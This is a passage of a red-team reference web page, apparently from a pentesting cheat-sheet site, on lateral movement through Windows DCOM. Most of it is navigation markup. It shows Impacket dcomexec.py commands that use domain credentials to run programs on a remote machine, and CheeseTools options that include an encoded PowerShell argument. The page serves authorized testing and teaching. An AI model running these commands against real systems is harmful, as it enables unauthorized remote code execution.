<label class="md-nav__title" for="__nav_6">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Containers
|
|
</label>
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../containers/docker/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Docker
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../containers/kubernetes/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Kubernetes
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--nested">
|
|
|
|
|
|
|
|
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_7" >
|
|
|
|
|
|
<label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="0">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Databases
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_7_label" aria-expanded="false">
|
|
<label class="md-nav__title" for="__nav_7">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Databases
|
|
</label>
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../databases/mssql-audit-checks/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
MSSQL - Audit Checks
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../databases/mssql-command-execution/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
MSSQL - Command Execution
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../databases/mssql-credentials/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
MSSQL - Credentials
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../databases/mssql-enumeration/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
MSSQL - Database Enumeration
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../databases/mssql-linked-database/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
MSSQL - Linked Database
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--nested">
|
|
|
|
|
|
|
|
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_8" >
|
|
|
|
|
|
<label class="md-nav__link" for="__nav_8" id="__nav_8_label" tabindex="0">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Devops
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_8_label" aria-expanded="false">
|
|
<label class="md-nav__title" for="__nav_8">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Devops
|
|
</label>
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../devops/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
CI/CD attacks
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../devops/azure-devops/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure DevOps
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../devops/buildkite/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
BuildKite
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../devops/circle-ci/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
CircleCI
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../devops/drone-ci/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Drone CI
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../devops/github-actions/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
GitHub Actions
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--nested">
|
|
|
|
|
|
|
|
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_9" >
|
|
|
|
|
|
<label class="md-nav__link" for="__nav_9" id="__nav_9_label" tabindex="0">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Methodology
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_9_label" aria-expanded="false">
|
|
<label class="md-nav__title" for="__nav_9">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Methodology
|
|
</label>
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../methodology/android-applications/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Android Application
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../methodology/bug-hunting-methodology/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Bug Hunting Methodology
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../methodology/source-code-analysis/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Source Code Analysis
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../methodology/vulnerability-reports/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Vulnerability Reports
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--nested">
|
|
|
|
|
|
|
|
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10" >
|
|
|
|
|
|
<label class="md-nav__link" for="__nav_10" id="__nav_10_label" tabindex="0">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Redteam
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_10_label" aria-expanded="false">
|
|
<label class="md-nav__title" for="__nav_10">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Redteam
|
|
</label>
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--nested">
|
|
|
|
|
|
|
|
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_1" >
|
|
|
|
|
|
<label class="md-nav__link" for="__nav_10_1" id="__nav_10_1_label" tabindex="0">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Access
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_1_label" aria-expanded="false">
|
|
<label class="md-nav__title" for="__nav_10_1">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Access
|
|
</label>
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/access/attack-surface-enumeration/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Subdomains Enumeration
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/access/html-smuggling/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
HTML Smuggling
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/access/initial-access/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Initial Access
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/access/office-attacks/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Office - Attacks
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/access/phishing/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Phishing
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/access/windows-download-execute/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Windows - Download and execute methods
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/access/windows-using-credentials/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Windows - Using credentials
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--nested">
|
|
|
|
|
|
|
|
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_2" >
|
|
|
|
|
|
<label class="md-nav__link" for="__nav_10_2" id="__nav_10_2_label" tabindex="0">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Escalation
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_2_label" aria-expanded="false">
|
|
<label class="md-nav__title" for="__nav_10_2">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Escalation
|
|
</label>
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/escalation/linux-privilege-escalation/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Linux - Privilege Escalation
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/escalation/windows-privilege-escalation/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Windows - Privilege Escalation
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--nested">
|
|
|
|
|
|
|
|
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_3" >
|
|
|
|
|
|
<label class="md-nav__link" for="__nav_10_3" id="__nav_10_3_label" tabindex="0">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Evasion
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_3_label" aria-expanded="false">
|
|
<label class="md-nav__title" for="__nav_10_3">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Evasion
|
|
</label>
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/evasion/edr-bypass/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Endpoint Detection and Response
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/evasion/elastic-edr/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Elastic EDR
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/evasion/linux-evasion/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Linux - Evasion
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/evasion/windows-amsi-bypass/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Windows - AMSI Bypass
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/evasion/windows-defenses/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Windows - Defenses
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/evasion/windows-dpapi/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Windows - DPAPI
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--nested">
|
|
|
|
|
|
|
|
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_4" >
|
|
|
|
|
|
<label class="md-nav__link" for="__nav_10_4" id="__nav_10_4_label" tabindex="0">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Persistence
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_4_label" aria-expanded="false">
|
|
<label class="md-nav__title" for="__nav_10_4">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Persistence
|
|
</label>
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/persistence/linux-persistence/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Linux - Persistence
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/persistence/rdp-persistence/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
RDP - Persistence
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/persistence/windows-persistence/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Windows - Persistence
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--nested">
|
|
|
|
|
|
|
|
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_5" >
|
|
|
|
|
|
<label class="md-nav__link" for="__nav_10_5" id="__nav_10_5_label" tabindex="0">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Pivoting
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_5_label" aria-expanded="false">
|
|
<label class="md-nav__title" for="__nav_10_5">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Pivoting
|
|
</label>
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../redteam/pivoting/network-pivoting-techniques/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Network Pivoting Techniques
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
</div>
|
|
</div>
|
|
</div>
|
|
|
|
|
|
|
|
<div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
|
|
<div class="md-sidebar__scrollwrap">
|
|
<div class="md-sidebar__inner">
|
|
|
|
|
|
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<label class="md-nav__title" for="__toc">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Table of contents
|
|
</label>
|
|
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
|
|
|
|
<li class="md-nav__item">
|
|
<a href="#dcom-via-mmc-application-class" class="md-nav__link">
|
|
<span class="md-ellipsis">
|
|
DCOM via MMC Application Class
|
|
</span>
|
|
</a>
|
|
|
|
</li>
|
|
|
|
<li class="md-nav__item">
|
|
<a href="#dcom-via-office" class="md-nav__link">
|
|
<span class="md-ellipsis">
|
|
DCOM via Office
|
|
</span>
|
|
</a>
|
|
|
|
</li>
|
|
|
|
<li class="md-nav__item">
|
|
<a href="#dcom-via-shellexecute" class="md-nav__link">
|
|
<span class="md-ellipsis">
|
|
DCOM via ShellExecute
|
|
</span>
|
|
</a>
|
|
|
|
</li>
|
|
|
|
<li class="md-nav__item">
|
|
<a href="#dcom-via-shellbrowserwindow" class="md-nav__link">
|
|
<span class="md-ellipsis">
|
|
DCOM via ShellBrowserWindow
|
|
</span>
|
|
</a>
|
|
|
|
</li>
|
|
|
|
<li class="md-nav__item">
|
|
<a href="#references" class="md-nav__link">
|
|
<span class="md-ellipsis">
|
|
References
|
|
</span>
|
|
</a>
|
|
|
|
</li>
|
|
|
|
</ul>
|
|
|
|
</nav>
|
|
</div>
|
|
</div>
|
|
</div>
|
|
|
|
|
|
|
|
<div class="md-content" data-md-component="content">
|
|
<article class="md-content__inner md-typeset">
|
|
|
|
|
|
|
|
|
|
|
|
<a href="https://github.com/swisskyrepo/InternalAllTheThings/blob/main/docs/active-directory/internal-dcom.md" title="Edit this page" class="md-content__button md-icon">
|
|
|
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M10 20H6V4h7v5h5v3.1l2-2V8l-6-6H6c-1.1 0-2 .9-2 2v16c0 1.1.9 2 2 2h4zm10.2-7c.1 0 .3.1.4.2l1.3 1.3c.2.2.2.6 0 .8l-1 1-2.1-2.1 1-1c.1-.1.2-.2.4-.2m0 3.9L14.1 23H12v-2.1l6.1-6.1z"/></svg>
|
|
</a>
|
|
|
|
|
|
|
|
|
|
|
|
<a href="https://github.com/swisskyrepo/InternalAllTheThings/raw/main/docs/active-directory/internal-dcom.md" title="View source of this page" class="md-content__button md-icon">
|
|
|
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 18c.56 0 1 .44 1 1s-.44 1-1 1-1-.44-1-1 .44-1 1-1m0-3c-2.73 0-5.06 1.66-6 4 .94 2.34 3.27 4 6 4s5.06-1.66 6-4c-.94-2.34-3.27-4-6-4m0 6.5a2.5 2.5 0 0 1-2.5-2.5 2.5 2.5 0 0 1 2.5-2.5 2.5 2.5 0 0 1 2.5 2.5 2.5 2.5 0 0 1-2.5 2.5M9.27 20H6V4h7v5h5v4.07c.7.08 1.36.25 2 .49V8l-6-6H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h4.5a8.2 8.2 0 0 1-1.23-2"/></svg>
|
|
</a>
|
|
|
|
|
|
|
|
<h1 id="internal-dcom">Internal - DCOM</h1>
|
|
<blockquote>
|
|
<p>DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer.</p>
|
|
</blockquote>
|
|
<ul>
|
|
<li>Impacket DCOMExec.py
|
|
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a><span class="n">dcomexec</span><span class="p">.</span><span class="n">py</span> <span class="p">[</span><span class="n">-h</span><span class="p">]</span> <span class="p">[</span><span class="n">-share</span> <span class="n">SHARE</span><span class="p">]</span> <span class="p">[</span><span class="n">-nooutput</span><span class="p">]</span> <span class="p">[</span><span class="n">-ts</span><span class="p">]</span> <span class="p">[</span><span class="n">-debug</span><span class="p">]</span> <span class="p">[</span><span class="n">-codec</span> <span class="n">CODEC</span><span class="p">]</span> <span class="p">[</span><span class="n">-object</span> <span class="p">[{</span><span class="n">ShellWindows</span><span class="p">,</span><span class="n">ShellBrowserWindow</span><span class="p">,</span><span class="n">MMC20</span><span class="p">}]]</span> <span class="p">[</span><span class="n">-hashes</span> <span class="n">LMHASH</span><span class="p">:</span><span class="n">NTHASH</span><span class="p">]</span> <span class="p">[</span><span class="n">-no-pass</span><span class="p">]</span> <span class="p">[</span><span class="n">-k</span><span class="p">]</span> <span class="p">[</span><span class="n">-aesKey</span> <span class="n">hex</span> <span class="n">key</span><span class="p">]</span> <span class="p">[</span><span class="n">-dc-ip</span> <span class="n">ip</span> <span class="n">address</span><span class="p">]</span> <span class="p">[</span><span class="n">-A</span> <span class="n">authfile</span><span class="p">]</span> <span class="p">[</span><span class="n">-keytab</span> <span class="n">KEYTAB</span><span class="p">]</span> <span class="n">target</span> <span class="no">[command ...]</span>
|
|
<a id="__codelineno-0-2" name="__codelineno-0-2" href="#__codelineno-0-2"></a><span class="n">dcomexec</span><span class="p">.</span><span class="n">py</span> <span class="n">-share</span> <span class="n">C</span><span class="p">$</span> <span class="n">-object</span> <span class="n">MMC20</span> <span class="s1">'<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>'</span>
|
|
<a id="__codelineno-0-3" name="__codelineno-0-3" href="#__codelineno-0-3"></a><span class="n">dcomexec</span><span class="p">.</span><span class="n">py</span> <span class="n">-share</span> <span class="n">C</span><span class="p">$</span> <span class="n">-object</span> <span class="n">MMC20</span> <span class="s1">'<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>'</span> <span class="s1">'ipconfig'</span>
|
|
<a id="__codelineno-0-4" name="__codelineno-0-4" href="#__codelineno-0-4"></a>
|
|
<a id="__codelineno-0-5" name="__codelineno-0-5" href="#__codelineno-0-5"></a><span class="n">python3</span> <span class="n">dcomexec</span><span class="p">.</span><span class="n">py</span> <span class="n">-object</span> <span class="n">MMC20</span> <span class="n">-silentcommand</span> <span class="n">-debug</span> <span class="nv">$DOMAIN</span><span class="p">/</span><span class="nv">$USER</span><span class="p">:</span><span class="nv">$PASSWORD</span><span class="p">\$@</span><span class="nv">$HOST</span> <span class="s1">'notepad.exe'</span>
|
|
<a id="__codelineno-0-6" name="__codelineno-0-6" href="#__codelineno-0-6"></a><span class="c"># -object MMC20 specifies that we wish to instantiate the MMC20.Application object.</span>
|
|
<a id="__codelineno-0-7" name="__codelineno-0-7" href="#__codelineno-0-7"></a><span class="c"># -silentcommand executes the command without attempting to retrieve the output.</span>
|
|
</code></pre></div></li>
|
|
<li>CheeseTools - https://github.com/klezVirus/CheeseTools
|
|
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="c"># https://klezvirus.github.io/RedTeaming/LateralMovement/LateralMovementDCOM/</span>
|
|
<a id="__codelineno-1-2" name="__codelineno-1-2" href="#__codelineno-1-2"></a><span class="n">-t</span><span class="p">,</span> <span class="p">-</span><span class="n">-target</span><span class="p">=</span><span class="n">VALUE</span> <span class="n">Target</span> <span class="n">Machine</span>
|
|
<a id="__codelineno-1-3" name="__codelineno-1-3" href="#__codelineno-1-3"></a><span class="n">-b</span><span class="p">,</span> <span class="p">-</span><span class="n">-binary</span><span class="p">=</span><span class="n">VALUE</span> <span class="n">Binary</span><span class="p">:</span> <span class="n">powershell</span><span class="p">.</span><span class="n">exe</span>
|
|
<a id="__codelineno-1-4" name="__codelineno-1-4" href="#__codelineno-1-4"></a><span class="n">-a</span><span class="p">,</span> <span class="p">-</span><span class="n">-args</span><span class="p">=</span><span class="n">VALUE</span> <span class="n">Arguments</span><span class="p">:</span> <span class="n">-enc</span> <span class="p"><</span><span class="n">blah</span><span class="p">></span>
|
|
<a id="__codelineno-1-5" name="__codelineno-1-5" href="#__codelineno-1-5"></a><span class="n">-m</span><span class="p">,</span> <span class="p">-</span><span class="n">-method</span><span class="p">=</span><span class="n">VALUE</span> <span class="n">Methods</span><span class="p">:</span> <span class="n">MMC20Application</span><span class="p">,</span> <span class="n">ShellWindows</span><span class="p">,</span>
|
|
<a id="__codelineno-1-6" name="__codelineno-1-6" href="#__codelineno-1-6"></a> <span class="n">ShellBrowserWindow</span><span class="p">,</span> <span class="n">ExcelDDE</span><span class="p">,</span> <span class="n">VisioAddonEx</span><span class="p">,</span>
|
|
<a id="__codelineno-1-7" name="__codelineno-1-7" href="#__codelineno-1-7"></a> <span class="n">OutlookShellEx</span><span class="p">,</span> <span class="n">ExcelXLL</span><span class="p">,</span> <span class="n">VisioExecLine</span><span class="p">,</span>
|
|
<a id="__codelineno-1-8" name="__codelineno-1-8" href="#__codelineno-1-8"></a> <span class="n">OfficeMacro</span>
|
|
<a id="__codelineno-1-9" name="__codelineno-1-9" href="#__codelineno-1-9"></a><span class="n">-r</span><span class="p">,</span> <span class="p">-</span><span class="n">-reg</span><span class="p">,</span> <span class="p">-</span><span class="n">-registry</span> <span class="n">Enable</span> <span class="n">registry</span> <span class="n">manipulation</span>
|
|
<a id="__codelineno-1-10" name="__codelineno-1-10" href="#__codelineno-1-10"></a><span class="n">-h</span><span class="p">,</span> <span class="p">-?,</span> <span class="p">-</span><span class="n">-help</span> <span class="n">Show</span> <span class="n">Help</span>
|
|
<a id="__codelineno-1-11" name="__codelineno-1-11" href="#__codelineno-1-11"></a>
|
|
